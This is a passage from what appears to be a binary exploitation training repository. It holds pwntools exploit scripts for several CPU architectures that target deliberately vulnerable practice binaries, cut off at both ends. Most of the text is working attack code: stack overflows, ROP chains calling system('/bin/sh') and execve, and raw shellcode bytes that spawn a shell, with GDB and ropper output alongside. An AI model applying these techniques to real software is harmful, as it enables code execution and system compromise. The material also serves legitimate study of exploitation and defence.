0x000000400085e000 37 | """ 38 | 39 | """ 40 | ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 41 | 0x000000000017a500: ld $t9, 8($sp); jalr $t9; nop; 42 | ... 43 | """ 44 | 45 | import struct 46 | import sys 47 | 48 | from pwn import * 49 | 50 | context(arch='mips64', os='linux', endian='big', word_size=64) 51 | 52 | binary_path = './bin/mips64/02-overwrite-ret' 53 | 54 | ra_saved_addr = 0x40007ffdf8 55 | buffer_addr = 0x40007ffd60 56 | libc_addr = 0x000000400085e000 57 | 58 | ld_t9_jump_t9_addr = libc_addr + 0x000000000017a500 59 | 60 | binary = ELF(binary_path) 61 | not_called_addr = binary.symbols['not_called'] 62 | 63 | p = process(binary_path) 64 | #p = gdb.debug([binary_path]) 65 | 66 | payload = '' 67 | payload += 'a' * (ra_saved_addr - buffer_addr) 68 | payload += p64(ld_t9_jump_t9_addr) 69 | payload += 'b' * 8 70 | payload += p64(not_called_addr) 71 | 72 | p.readuntil('> ') 73 | p.write(payload) 74 | p.interactive() 75 | -------------------------------------------------------------------------------- /pwn/ppc64/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00000000100007b4 <+0>: mflr r0 7 | 0x00000000100007b8 <+4>: std r0,16(r1) 8 | ... 9 | 0x0000000010000820 <+108>: ld r0,16(r1) 10 | 0x0000000010000824 <+112>: mtlr r0 11 | 0x0000000010000828 <+116>: ld r31,-8(r1) 12 | 0x000000001000082c <+120>: blr 13 | 0x0000000010000830 <+124>: .long 0x0 14 | 0x0000000010000834 <+128>: .long 0x1 15 | 0x0000000010000838 <+132>: lwz r0,1(r1) 16 | End of assembler dump. 17 | (gdb) b vulnerable 18 | Breakpoint 1 at 0x100007c8: file src/04-shellcode-static.c, line 6. 19 | (gdb) b *0x0000000010000820 20 | Breakpoint 2 at 0x10000820: file src/04-shellcode-static.c, line 14. 21 | (gdb) c 22 | Continuing. 23 | 24 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 25 | 6 printf("> "); 26 | (gdb) p &buffer[0] 27 | $1 = 0x40007ff930 "" 28 | (gdb) c 29 | Continuing. 30 | 31 | Breakpoint 2, 0x0000000010000820 in vulnerable () at src/04-shellcode-static.c:14 32 | 14 } 33 | (gdb) p/x $r1+16 34 | $2 = 0x40007ff9d0 35 | """ 36 | 37 | import struct 38 | import sys 39 | 40 | from pwn import * 41 | 42 | context(arch='powerpc64', os='linux', endian='big', word_size=64) 43 | 44 | binary_path = './bin/ppc64/04-shellcode-static' 45 | 46 | saved_pc_addr = 0x40007ff9d0 47 | buffer_addr = 0x40007ff930 48 | 49 | # Adapted from http://shell-storm.org/shellcode/files/shellcode-86.php 50 | shellcode = \ 51 | '\x7c\x3f\x0b\x78' + \ 52 | '\x7c\xa5\x2a\x79' + \ 53 | '\x42\x40\xff\xf9' + \ 54 | '\x7f\x08\x02\xa6' + \ 55 | '\x3b\x18\x01\x34' + \ 56 | '\x98\xb8\xfe\xfb' + \ 57 | '\x38\x78\xfe\xf4' + \ 58 | '\xf8\x61\xff\xf0' + \ 59 | '\x38\x81\xff\xf0' + \ 60 | '\xf8\xa1\xff\xf8' + \ 61 | '\x3b\xc0\x01\x60' + \ 62 | '\x7f\xc0\x2e\x70' + \ 63 | '\x44\x00\x00\x02' + \ 64 | '/bin/shZ' 65 | 66 | p = process(binary_path) 67 | #p = gdb.debug([binary_path]) 68 | 69 | payload = '' 70 | payload += 'a' * (saved_pc_addr - buffer_addr) 71 | payload += p64(saved_pc_addr + 8) 72 | payload += shellcode 73 | 74 | p.readuntil('> ') 75 | p.write(payload) 76 | p.interactive() 77 | -------------------------------------------------------------------------------- /pwn/sparc64/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000000100820 <+0>: save %sp, -304, %sp 7 | ... 8 | 0x000000000010084c <+44>: add %fp, 0x77f, %g1 9 | 0x0000000000100850 <+48>: mov 0x100, %o2 10 | 0x0000000000100854 <+52>: mov %g1, %o1 11 | 0x0000000000100858 <+56>: clr %o0 12 | 0x000000000010085c <+60>: call 0x202180 13 | ... 14 | 0x000000000010086c <+76>: return %i7 + 8 15 | 0x0000000000100870 <+80>: nop 16 | End of assembler dump. 17 | (gdb) b *0x000000000010085c 18 | Breakpoint 1 at 0x10085c: file src/02-overwrite-ret.c, line 15. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, 0x000000000010085c in vulnerable () at src/02-overwrite-ret.c:15 23 | 15 read(STDIN_FILENO, &buffer[0], 256); 24 | (gdb) p &buffer[0] 25 | $1 = 0x4000800a30 "" 26 | (gdb) p/x $fp+0x7ff 27 | $2 = 0x4000800ab0 28 | """ 29 | 30 | """ 31 | $ qemu-sparc64 -L /usr/sparc64-linux-gnu/ -strace ./bin/sparc64/02-overwrite-ret 32 | ... 33 | 29248 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 34 | ... 35 | 29248 mmap(NULL,2531064,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400094e000 36 | ... 37 | """ 38 | 39 | import struct 40 | import sys 41 | 42 | from pwn import * 43 | 44 | context(arch='sparc64', os='linux', endian='big', word_size=64) 45 | 46 | binary_path = './bin/sparc64/02-overwrite-ret' 47 | libc_path = '/usr/sparc64-linux-gnu/lib/libc-2.27.so' 48 | 49 | buffer_addr = 0x4000800a30 50 | main_frame_addr = 0x4000800ab0 51 | libc_addr = 0x000000400094e000 52 | 53 | binary = ELF(binary_path) 54 | not_called_addr = binary.symbols['not_called'] 55 | 56 | libc = ELF(libc_path) 57 | libc_data_header = libc.get_section_by_name('.data').header 58 | libc_rw_addr = libc_addr + libc_data_header.sh_addr + ((libc_data_header.sh_size / 2) & ~0x8) 59 | 60 | p = process(binary_path) 61 | #p = gdb.debug([binary_path]) 62 | 63 | payload = '' 64 | payload += 'a' * (main_frame_addr - buffer_addr) 65 | payload += 'b' * (14 * 8) 66 | payload += p64(libc_rw_addr) # fp -> sp 67 | payload += p64(not_called_addr - 8) # i7 -> pc 68 | 69 | p.readuntil('> ') 70 | p.write(payload) 71 | p.interactive() 72 | -------------------------------------------------------------------------------- /pwn/x86-64/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) bt 5 | #0 0x00007ffff7af4081 in __GI___libc_read (fd=0, buf=0x7fffffffdd80, nbytes=512) at ../sysdeps/unix/sysv/linux/read.c:27 6 | #1 0x0000000000400643 in vulnerable () at src/04-shellcode-static.c:10 7 | #2 0x0000000000400669 in main (argc=1, argv=0x7fffffffdf08) at src/04-shellcode-static.c:17 8 | (gdb) disassemble vulnerable 9 | Dump of assembler code for function vulnerable: 10 | 0x0000000000400607 <+0>: push rbp 11 | ... 12 | 0x000000000040064f <+72>: ret 13 | End of assembler dump. 14 | (gdb) b *0x000000000040064f 15 | Breakpoint 1 at 0x40064f: file src/04-shellcode-static.c, line 14. 16 | (gdb) c 17 | Continuing. 18 | 19 | Breakpoint 1, 0x000000000040064f in vulnerable () at src/04-shellcode-static.c:14 20 | 14 } 21 | (gdb) p &buffer[0] 22 | $1 = 0x7fffffffdd80 'a' , " \336\377\377\377\177" 23 | (gdb) i r $rsp 24 | rsp 0x7fffffffde08 0x7fffffffde08 25 | (gdb) info proc mappings 26 | process 28617 27 | Mapped address spaces: 28 | 29 | Start Addr End Addr Size Offset objfile 30 | ... 31 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 32 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 33 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 34 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 35 | ... 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 42 | 43 | context(arch='amd64', os='linux', endian='little', word_size=64) 44 | 45 | binary_path = './bin/x86-64/04-shellcode-static' 46 | libc_path = '/lib/x86_64-linux-gnu/libc-2.27.so' 47 | 48 | vulnerable_ret_addr = 0x7fffffffde08 49 | buffer_addr = 0x7fffffffdd80 50 | libc_addr = 0x7ffff79e4000 51 | 52 | shellcode = asm(shellcraft.sh()) 53 | 54 | p = process(binary_path) 55 | #g = gdb.attach(p, 'file ./bin/x86-64/04-shellcode-static') 56 | 57 | payload = '' 58 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 59 | payload += p64(vulnerable_ret_addr + 8) 60 | payload += shellcode 61 | 62 | p.readuntil('> ') 63 | p.write(payload) 64 | p.interactive() 65 | -------------------------------------------------------------------------------- /pwn/x86/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x80484e6: file src/08-overwrite-global.c, line 8. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/i386-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/i386-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:8 13 | 8 int vulnerable() { 14 | (gdb) i r $esp 15 | esp 0xffffcf6c 0xffffcf6c 16 | (gdb) p &buffer[0] 17 | $1 = 0xffffcee0 "" 18 | (gdb) info proc mappings 19 | process 7075 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 25 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 26 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 27 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/i386-linux-gnu/libc-2.27.so 33 | 0x00024b5e: pop eax; ret; 34 | 0x001926d5: pop ecx; ret; 35 | 0x0002c05e: mov dword ptr [eax], ecx; ret; 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 42 | 43 | context(arch='x86', os='linux', endian='little', word_size=32) 44 | 45 | binary_path = './bin/x86/08-overwrite-global' 46 | 47 | vulnerable_ret_addr = 0xffffcf6c 48 | buffer_addr = 0xffffcee0 49 | libc_addr = 0xf7dd1000 50 | 51 | pop_eax_ret_addr = libc_addr + 0x00024b5e 52 | pop_ecx_ret_addr = libc_addr + 0x001926d5 53 | mov_dword_ptr_eax_ecx_ret_addr = libc_addr + 0x0002c05e 54 | 55 | binary = ELF(binary_path) 56 | not_called_addr = binary.symbols['not_called'] 57 | x_addr = binary.symbols['x'] 58 | 59 | p = process(binary_path) 60 | #p = gdb.debug([binary_path]) 61 | 62 | payload = '' 63 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 64 | payload += p32(pop_eax_ret_addr) 65 | payload += p32(x_addr) 66 | payload += p32(pop_ecx_ret_addr) 67 | payload += p32(0xbeefc0de) 68 | payload += p32(mov_dword_ptr_eax_ecx_ret_addr) 69 | payload += p32(not_called_addr) 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 | p.interactive() 74 | -------------------------------------------------------------------------------- /pwn/x86-64/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x4005b7: file src/06-system-rop.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/06-system-rop.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $rsp 15 | rsp 0x7fffffffddf8 0x7fffffffddf8 16 | (gdb) p &buffer[0] 17 | $1 = 0x7fffffffdd70 "\377\377\377\377" 18 | (gdb) info proc mappings 19 | process 14019 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 25 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/x86_64-linux-gnu/libc-2.27.so 33 | 0x000000000002155f: pop rdi; ret; 34 | """ 35 | 36 | import struct 37 | import sys 38 | 39 | from pwn import * 40 | 41 | context(arch='amd64', os='linux', endian='little', word_size=64) 42 | 43 | binary_path = './bin/x86-64/06-system-rop' 44 | libc_path = '/lib/x86_64-linux-gnu/libc-2.27.so' 45 | 46 | vulnerable_ret_addr = 0x7fffffffddf8 47 | buffer_addr = 0x7fffffffdd70 48 | libc_addr = 0x7ffff79e4000 49 | 50 | pop_rdi_ret_addr = libc_addr + 0x000000000002155f 51 | 52 | libc = ELF(libc_path) 53 | system_addr = libc_addr + libc.symbols['system'] 54 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 55 | 56 | retq_asm = asm('retq') 57 | retq_addr = libc_addr + libc.search(retq_asm).next() 58 | 59 | p = process(binary_path) 60 | #p = gdb.debug([binary_path]) 61 | 62 | payload = '' 63 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 64 | payload += p64(retq_addr) # align stack 65 | payload += p64(pop_rdi_ret_addr) 66 | payload += p64(bin_sh_addr) 67 | payload += p64(system_addr) 68 | 69 | p.readuntil('> ') 70 | p.write(payload) 71 | p.interactive() 72 | -------------------------------------------------------------------------------- /pwn/mips64/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | ''' 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000c10 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000c14 <+4>: sd ra,152(sp) 8 | ... 9 | 0x0000000120000c9c <+140>: ld ra,152(sp) 10 | 0x0000000120000ca0 <+144>: ld s8,144(sp) 11 | 0x0000000120000ca4 <+148>: ld gp,136(sp) 12 | 0x0000000120000ca8 <+152>: daddiu sp,sp,160 13 | 0x0000000120000cac <+156>: jr ra 14 | 0x0000000120000cb0 <+160>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000c30: file src/04-shellcode-static.c, line 6. 18 | (gdb) b *0x0000000120000c9c 19 | Breakpoint 2 at 0x120000c9c: file src/04-shellcode-static.c, line 14. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 24 | 6 printf('> '); 25 | (gdb) p &buffer[0] 26 | $1 = 0x40007ffd60 '' 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x0000000120000c9c in vulnerable () at src/04-shellcode-static.c:14 31 | 14 } 32 | (gdb) p/x $sp+152 33 | $2 = 0x40007ffdf8 34 | ''' 35 | 36 | ''' 37 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/04-shellcode-static 38 | ... 39 | 18720 openat(AT_FDCWD,'/lib/libc.so.6',O_RDONLY|O_CLOEXEC) = 3 40 | ... 41 | 18720 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 42 | ... 43 | ''' 44 | 45 | import struct 46 | import sys 47 | 48 | from pwn import * 49 | 50 | context(arch='mips64', os='linux', endian='big', word_size=64) 51 | 52 | binary_path = './bin/mips64/04-shellcode-static' 53 | 54 | ra_saved_addr = 0x40007ffdf8 55 | buffer_addr = 0x40007ffd60 56 | libc_addr = 0x000000400085e000 57 | 58 | # Adapted from https://www.exploit-db.com/exploits/45287 59 | shellcode = \ 60 | '\x62\x2f\x0c\x3c'[::-1] + \ 61 | '\x6e\x69\x8c\x35'[::-1] + \ 62 | '\xf4\xff\xac\xaf'[::-1] + \ 63 | '\x73\x2f\x0d\x3c'[::-1] + \ 64 | '\x00\x68\xad\x35'[::-1] + \ 65 | '\xf8\xff\xad\xaf'[::-1] + \ 66 | '\xf4\xff\xa4\x67'[::-1] + \ 67 | '\xff\xff\x05\x28'[::-1] + \ 68 | '\xff\xff\x06\x28'[::-1] + \ 69 | '\xc1\x13\x02\x24'[::-1] + \ 70 | '\x0c\x01\x01\x01'[::-1] 71 | 72 | p = process(binary_path) 73 | #p = gdb.debug([binary_path]) 74 | 75 | payload = '' 76 | payload += 'a' * (ra_saved_addr - buffer_addr) 77 | payload += p64(ra_saved_addr + 8) 78 | payload += shellcode 79 | 80 | p.readuntil('> ') 81 | p.write(payload) 82 | p.interactive() 83 | -------------------------------------------------------------------------------- /pwn/arm64/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x0000000000400678 <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x0000000000400690 <+24>: ldp x29, x30, [sp], #32 9 | 0x0000000000400694 <+28>: ret 10 | End of assembler dump. 11 | (gdb) b vulnerable 12 | Breakpoint 1 at 0x40063c: file src/06-system-rop.c, line 6. 13 | (gdb) b *0x0000000000400690 14 | Breakpoint 2 at 0x400690: file src/06-system-rop.c, line 17. 15 | (gdb) c 16 | Continuing. 17 | 18 | Breakpoint 1, vulnerable () at src/06-system-rop.c:6 19 | 6 printf("> "); 20 | (gdb) p &buffer[0] 21 | $1 = 0x40007ffd80 "" 22 | (gdb) c 23 | Continuing. 24 | 25 | Breakpoint 2, main (argc=1, argv=0x40007fff58) at src/06-system-rop.c:17 26 | 17 } 27 | (gdb) i r $sp 28 | sp 0x40007ffe00 0x40007ffe00 29 | """ 30 | 31 | """ 32 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/06-system-rop 33 | ... 34 | 24334 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 24334 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 37 | ... 38 | """ 39 | 40 | """ 41 | $ ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 42 | 0x00036edc: ldp x24, x25, [sp, #0x38]; ldp x29, x30, [sp], #0x50; ret; 43 | 0x000ce2ec: mov x0, x24; blr x25; 44 | """ 45 | 46 | import struct 47 | import sys 48 | 49 | from pwn import * 50 | 51 | context(arch='aarch64', os='linux', endian='little', word_size=64) 52 | 53 | binary_path = './bin/arm64/06-system-rop' 54 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 55 | 56 | saved_x30_addr = 0x40007ffe00 + 8 57 | buffer_addr = 0x40007ffd80 58 | libc_addr = 0x0000004000852000 59 | 60 | ldp_x24_x25_x30_ret_addr = libc_addr + 0x00036edc 61 | mov_x0_x24_blr_x25_addr = libc_addr + 0x000ce2ec 62 | 63 | libc = ELF(libc_path) 64 | system_addr = libc_addr + libc.symbols['system'] 65 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 66 | 67 | p = process(binary_path) 68 | #p = gdb.debug([binary_path]) 69 | 70 | payload = '' 71 | payload += 'a' * (saved_x30_addr - buffer_addr) 72 | payload += p64(ldp_x24_x25_x30_ret_addr) 73 | payload += 'b' * 16 74 | payload += p64(0) # x29 75 | payload += p64(mov_x0_x24_blr_x25_addr) # x30 76 | payload += 'c' * (0x38 - 16) 77 | payload += p64(bin_sh_addr) # x24 78 | payload += p64(system_addr) # x25 79 | 80 | p.readuntil('> ') 81 | p.write(payload) 82 | p.interactive() 83 | -------------------------------------------------------------------------------- /pwn/x86-64/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x400607: file src/08-overwrite-global.c, line 8. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:8 13 | 8 int vulnerable() { 14 | (gdb) i r $rsp 15 | rsp 0x7fffffffdda8 0x7fffffffdda8 16 | (gdb) p &buffer[0] 17 | $1 = 0x7fffffffdd20 "\377\377\377\377" 18 | (gdb) info proc mappings 19 | process 7590 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 25 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/x86_64-linux-gnu/libc-2.27.so 33 | 0x00000000000439c8: pop rax; ret; 34 | 0x000000000002155f: pop rdi; ret; 35 | 0x0000000000097055: mov qword ptr [rax], rdi; ret; 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 42 | 43 | context(arch='amd64', os='linux', endian='little', word_size=64) 44 | 45 | binary_path = './bin/x86-64/08-overwrite-global' 46 | 47 | vulnerable_ret_addr = 0x7fffffffdda8 48 | buffer_addr = 0x7fffffffdd20 49 | libc_addr = 0x7ffff79e4000 50 | 51 | pop_rax_ret_addr = libc_addr + 0x00000000000439c8 52 | pop_rdi_ret_addr = libc_addr + 0x000000000002155f 53 | mov_qword_ptr_rax_rdi_ret_addr = libc_addr + 0x0000000000097055 54 | 55 | binary = ELF(binary_path) 56 | not_called_addr = binary.symbols['not_called'] 57 | x_addr = binary.symbols['x'] 58 | 59 | p = process(binary_path) 60 | #p = gdb.debug([binary_path]) 61 | 62 | payload = '' 63 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 64 | payload += p64(pop_rax_ret_addr) 65 | payload += p64(x_addr) 66 | payload += p64(pop_rdi_ret_addr) 67 | payload += p64(0xdeadbabebeefc0de) 68 | payload += p64(mov_qword_ptr_rax_rdi_ret_addr) 69 | payload += p64(not_called_addr) 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 | p.interactive() 74 | -------------------------------------------------------------------------------- /pwn/mips/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00400780 <+0>: addiu sp,sp,-160 7 | ... 8 | 0x00400804 <+132>: lw ra,156(sp) 9 | 0x00400808 <+136>: lw s8,152(sp) 10 | 0x0040080c <+140>: addiu sp,sp,160 11 | 0x00400810 <+144>: jr ra 12 | 0x00400814 <+148>: nop 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x40079c: file src/07-execve-rop.c, line 6. 16 | (gdb) b *0x00400804 17 | Breakpoint 2 at 0x400804: file src/07-execve-rop.c, line 11. 18 | (gdb) c 19 | Continuing. 20 | 21 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 22 | 6 printf("> "); 23 | (gdb) p &buffer[0] 24 | $1 = 0x7fffef28 "\177~\272X\177~\243\f\177|\210D" 25 | (gdb) c 26 | Continuing. 27 | 28 | Breakpoint 2, 0x00400804 in vulnerable () at src/07-execve-rop.c:11 29 | 11 } 30 | (gdb) p/x $sp+156 31 | $2 = 0x7fffefac 32 | """ 33 | 34 | """ 35 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/08-overwrite-global 36 | ... 37 | 10601 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 38 | ... 39 | 10601 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 40 | ... 41 | """ 42 | 43 | """ 44 | $ ropper --nocolor --file /usr/mips-linux-gnu/lib/libc-2.27.so 45 | 0x000667cc: lw $ra, 0x3c($sp); lw $s1, 0x38($sp); lw $s0, 0x34($sp); jr $ra; addiu $sp, $sp, 0x40; 46 | 0x000f2a10: sw $s0, ($s1); lw $ra, 0x3c($sp); lw $s1, 0x38($sp); lw $s0, 0x34($sp); jr $ra; addiu $sp, $sp, 0x40; 47 | """ 48 | 49 | import struct 50 | import sys 51 | 52 | from pwn import * 53 | 54 | context(arch='mips', os='linux', endian='big', word_size=32) 55 | 56 | binary_path = './bin/mips/08-overwrite-global' 57 | 58 | ra_saved_addr = 0x7fffefac 59 | buffer_addr = 0x7fffef28 60 | libc_addr = 0x7f615000 61 | 62 | lw_s1_s0_addr = libc_addr + 0x000667cc 63 | sw_s0_s1_addr = libc_addr + 0x000f2a10 64 | 65 | binary = ELF(binary_path) 66 | not_called_addr = binary.symbols['not_called'] 67 | x_addr = binary.symbols['x'] 68 | 69 | p = process(binary_path) 70 | #p = gdb.debug([binary_path]) 71 | 72 | payload = '' 73 | payload += 'a' * (ra_saved_addr - buffer_addr) 74 | payload += p32(lw_s1_s0_addr) 75 | 76 | payload += 'b' * 0x34 77 | payload += p32(0xbeefc0de) # s0 78 | payload += p32(x_addr) # s1 79 | payload += p32(sw_s0_s1_addr) # ra 80 | 81 | payload += 'c' * 0x3c 82 | payload += p32(not_called_addr) # ra 83 | 84 | p.readuntil('> ') 85 | p.write(payload) 86 | p.interactive() 87 | -------------------------------------------------------------------------------- /pwn/x86/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x80484b6: file src/07-execve-rop.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/i386-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/i386-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $esp 15 | esp 0xffffcf8c 0xffffcf8c 16 | (gdb) p &buffer[0] 17 | $1 = 0xffffcf00 "" 18 | (gdb) info proc mappings 19 | process 15016 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 25 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 26 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 27 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/i386-linux-gnu/libc-2.27.so 33 | 0x00002d37: int 0x80; 34 | 0x00024b5e: pop eax; ret; 35 | 0x00018be5: pop ebx; ret; 36 | 0x001926d5: pop ecx; ret; 37 | 0x00001aae: pop edx; ret; 38 | """ 39 | 40 | import struct 41 | import sys 42 | 43 | from pwn import * 44 | 45 | context(arch='x86', os='linux', endian='little', word_size=32) 46 | 47 | binary_path = './bin/x86/07-execve-rop' 48 | libc_path = '/lib/i386-linux-gnu/libc-2.27.so' 49 | 50 | vulnerable_ret_addr = 0xffffcf8c 51 | buffer_addr = 0xffffcf00 52 | libc_addr = 0xf7dd1000 53 | 54 | int_0x80_addr = libc_addr + 0x00002d37 55 | pop_eax_ret_addr = libc_addr + 0x00024b5e 56 | pop_ebx_ret_addr = libc_addr + 0x00018be5 57 | pop_ecx_ret_addr = libc_addr + 0x001926d5 58 | pop_edx_ret_addr = libc_addr + 0x00001aae 59 | 60 | libc = ELF(libc_path) 61 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 62 | 63 | p = process(binary_path) 64 | #p = gdb.debug([binary_path]) 65 | 66 | payload = '' 67 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 68 | payload += p32(pop_eax_ret_addr) 69 | payload += p32(0xb) # execve syscall 70 | payload += p32(pop_ebx_ret_addr) 71 | payload += p32(bin_sh_addr) 72 | payload += p32(pop_ecx_ret_addr) 73 | payload += p32(0) # argv 74 | payload += p32(pop_edx_ret_addr) 75 | 